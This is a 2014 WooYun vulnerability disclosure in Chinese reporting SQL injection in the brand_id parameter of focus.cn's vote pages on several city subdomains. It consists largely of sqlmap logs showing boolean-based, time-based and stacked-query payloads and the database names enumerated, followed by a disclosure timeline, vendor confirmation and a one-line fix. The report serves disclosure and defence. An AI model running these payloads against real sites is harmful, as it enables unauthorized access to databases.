乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-07-12: 细节已通知厂商并且等待厂商处理中 2014-07-13: 厂商已经确认,细节仅向厂商公开 2014-07-23: 细节向核心白帽子及相关领域专家公开 2014-08-02: 细节向普通白帽子公开 2014-08-12: 细节向实习白帽子公开 2014-08-26: 细节向公众公开
世界杯决赛德国3:0
具体参数是:brand_intro.phpgoogle一下发现
gz.focus.cn/vote/brand_intro.php?brand_id=46house.focus.cn/vote/brand_intro.php?brand_id=67dl.focus.cn/vote/brand_intro.php?brand_id=house.focus.cn/vote/brand_intro.php?brand_id=3bjmsg.focus.cn/vote/brand_intro.php?brand_id=hz.focus.cn/vote/brand_intro.php?brand_id=19qhd.focus.cn/vote/brand_intro.php?brand_id=sh.focus.cn/vote/brand_intro.php?brand_id=50dg.focus.cn/vote/brand_intro.php?brand_id=97office.focus.cn/vote/brand_intro.php?brand_id=...............
gz.focus.cn/vote/brand_intro.php?brand_id=46
[14:42:49] [INFO] fetched random HTTP User-Agent header from file 'C:\Users\ZX\Sqlmap\txt\user-agents.txt': Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.3) Gecko/20121221 Firefox/3.6.8[14:42:50] [INFO] resuming back-end DBMS 'mysql'[14:42:50] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: brand_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: brand_id=34' AND 4309=4309 AND 'hKAW'='hKAW Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: brand_id=34' AND SLEEP(5) AND 'iACN'='iACN---[14:42:51] [INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL 5.0.11[14:42:51] [INFO] fetching current database[14:42:51] [INFO] resumed: hjuhecurrent database: 'hjuhe'[14:42:51] [INFO] fetching database names[14:42:51] [INFO] fetching number of databases[14:42:51] [INFO] resumed: 7[14:42:51] [INFO] resumed: information_schema[14:42:51] [INFO] resumed: cirea[14:42:51] [INFO] resumed: house[14:42:51] [INFO] resumed: mysql[14:42:51] [INFO] resumed: mysql_identity[14:42:51] [INFO] resumed: realestatehouse[14:42:51] [INFO] resumed: sohuhouseavailable databases [7]:[*] cirea[*] house[*] information_schema[*] mysql[*] mysql_identity[*] realestatehouse[*] sohuhouse
--------------------------------------------------------------http://dg.focus.cn/vote/brand_intro.php?brand_id=34
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: brand_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: brand_id=34' AND 9132=9132 AND 'Nzqf'='Nzqf---[14:43:41] [INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL 5[14:43:41] [INFO] fetching current database[14:43:41] [INFO] resumed: housecurrent database: 'house'
sh.focus.cn/vote/brand_intro.php?brand_id=50
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: brand_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: brand_id=50' AND 4282=4282 AND 'XOcu'='XOcu Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: brand_id=50'; SELECT SLEEP(5)-----[14:47:39] [INFO] testing MySQL[14:47:39] [INFO] confirming MySQL[14:47:39] [INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL >= 5.0.0[14:47:39] [INFO] fetching current database[14:47:39] [INFO] resumed: housecurrent database: 'house'[14:47:39] [INFO] fetching database names[14:47:39] [INFO] fetching number of databases[14:47:39] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[14:47:39] [INFO] retrieved:sqlmap got a 302 redirect to 'http://www.focus.cn'. Do you want to follow? [Y/n] n[14:47:41] [WARNING] time-based comparison requires larger statistical model, please wait...........................[14:48:17] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors[14:48:17] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'[14:48:17] [ERROR] unable to retrieve the number of databases[14:48:17] [INFO] falling back to current database[14:48:17] [INFO] fetching current databaseavailable databases [1]:[*] house
qhd.focus.cn/vote/brand_intro.php?brand_id=
Place: GETParameter: brand_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: brand_id=14' AND 1931=1931 AND 'fYke'='fYke Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: brand_id=14'; SELECT SLEEP(5)-----[14:53:12] [INFO] testing MySQL[14:53:12] [INFO] confirming MySQL[14:53:12] [INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL >= 5.0.0[14:53:12] [INFO] fetching current database[14:53:12] [INFO] resumed: ?luqecurrent database: '?luqe'
过滤参数
危害等级:高
漏洞Rank:15
确认时间:2014-07-13 00:37
感谢支持。
暂无